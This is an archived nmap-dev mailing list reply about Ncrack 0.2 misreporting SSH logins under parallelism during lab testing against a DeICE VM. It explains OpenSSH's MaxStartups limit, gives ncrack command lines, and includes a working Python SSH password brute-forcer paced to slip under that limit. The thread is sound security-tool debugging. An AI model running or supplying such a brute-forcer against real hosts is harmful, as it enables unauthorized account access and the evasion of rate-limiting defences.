Nmap Development mailing list archives

Re: Ncrack 0.2 Alpha - SSH behaviour


From: Robin Wood <robin () digininja org>
Date: Tue, 31 Aug 2010 12:58:20 +0100

On 31 August 2010 12:49, Mike Westmacott <mike.westmacott () irmplc com> wrote:
Hi,

I've been testing ncrack 0.2 and have found some behaviour where, for
some wordlists, it will report that a password failed even though it
is the correct one, yet on others it will be OK.

This may be related to the overall size of the wordlist and also to the
parallelism in effect. I was testing against DeICE 1.100 with a
username/password that is found as part of the testing against that VM
(I will avoid divulging this info on the list!). I was using a 3.3MB
wordlist which also contains some symbolic and alphanumeric passwords.
If I extract all words that begin with the same letter as the password,
then I get a match. If I concatenate that file with itself to make it
>3.3MB, it still works. If I put the password at various intervals
throughout the original password file, it doesn't match (indeed, it
reports that the login failed) - even when it's the first password.
By removing parallelism the problem went away. I was only ever testing
against one explicit user.
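
(For reference, the rough shape of the command lines in question - the
target address and username here are placeholders, not the real ones -
was along these lines, with CL=1 being the run that removed
parallelism:

    ncrack -v --user bob -P wordlist.txt ssh://192.168.1.100
    ncrack -v --user bob -P wordlist.txt ssh://192.168.1.100,CL=1
)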

I can put together a tar of options, results, debug output and the
dictionary files - please let me know if you would like to see the
results.

Overall, though, I was hugely impressed by the speed, although I found
that tweaking the retry delay was essential to getting it working OK
(or maybe I was being confused by the problem I have just described -
not sure :)


I've not tried ncrack, but I am working on an SSH bruteforcer of my own,
and I've found a problem when testing against OpenSSH: there is a
MaxStartups value that governs the "maximum number of concurrent
unauthenticated connections" - check man sshd_config for more info.
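
For example, the relevant bit of /etc/ssh/sshd_config looks like this
(10 being the stock default - the exact syntax is in the man page):

    # Maximum number of concurrent unauthenticated connections to sshd
    MaxStartups 10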

I don't know if it was designed to protect against brute-force attacks,
but it has that effect: if you fire loads of passwords at once, you
trigger this limit and all new connections are rejected.
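
From what I've seen, when that happens the client side just gets
something like "ssh_exchange_identification: Connection closed by
remote host" before any authentication even takes place.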

The default is 10 connections, so when I go parallel I hit this limit
fairly quickly. If I go single-threaded and put a slight pause between
attempts, then I can get through large lists.
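
To give an idea, my loop is basically the equivalent of this Python
sketch (paramiko-based; the host, username and delay are made up for
illustration):

    import time
    import paramiko

    HOST = "192.168.1.100"  # placeholder target
    USER = "bob"            # placeholder username

    def try_password(password):
        """One sequential attempt; True if the password authenticates."""
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            client.connect(HOST, username=USER, password=password,
                           allow_agent=False, look_for_keys=False)
            return True
        except paramiko.AuthenticationException:
            return False
        finally:
            client.close()

    with open("wordlist.txt") as wordlist:
        for line in wordlist:
            candidate = line.rstrip("\n")
            if try_password(candidate):
                print("Found: %s" % candidate)
                break
            time.sleep(0.5)  # slight pause between attempts

One connection per attempt plus the sleep means there is never more
than one unauthenticated connection open, so the MaxStartups limit is
never hit.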

This may be completely the wrong track, but it's worth looking at if it
hasn't already been.

Robin
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

